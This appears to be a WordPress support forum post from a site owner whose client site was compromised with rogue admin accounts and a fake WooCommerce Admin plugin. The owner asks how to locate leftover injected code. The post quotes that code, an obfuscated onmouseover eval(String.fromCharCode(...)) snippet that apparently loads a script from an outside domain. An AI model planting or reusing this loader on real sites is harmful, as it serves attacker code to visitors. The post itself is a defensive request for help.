Site Compromised – A Few Things…
-
Hello –
Had a client’s website get compromised literally in front of my eyes where Admin accounts were being created along with a fake WooCommerce Admin plugin that was being added to the plugins directory.
Meanwhile, there were no alerts or red flags sent, we only knew about it because of the email notifications from the website about new users being added to the website and immediately jumped into action to remove the new users and the fake plugin that was picked up by a Wordfence scan after it was installed.
There is still remnants of JS code being injected into the “body” class of the website:
onmouseoverjavascriptevalString-fromCharCode33102117110991161051111104010144115441164112311011710810861611014610310111669108101109101110116661217310040349710010910511010611511297103101344138384040116611014699114101971161016910810110910111011640115414146971151211109961334844116461051006134971001091051101061151129710310134441164611511499613410411611611211558474711710998114105971199710810710511010346991111094799111117110116101114471151051091121081014610611534444010161101461031011166910810110910111011611566121849710378971091014011541914893414611297114101110116781111001014610511011510111411666101102111114101401164410141411254010011199117109101110116443411599114105112116344159
Attempting to track down where this is being output because neither Wordfence nor Quttera is picking up on this code being left behind or its location.
We have cleaned out several sites in the past few months and this one seems to be the strangest one we’ve seen. Typically it has been just some code injection in some WP files, but Admin accounts and a fake plugin undetected is really frightening.
Any insight on how to do a deeper scan to find where that code above is being output into the site?
Thanks.
- The topic ‘Site Compromised – A Few Things…’ is closed to new replies.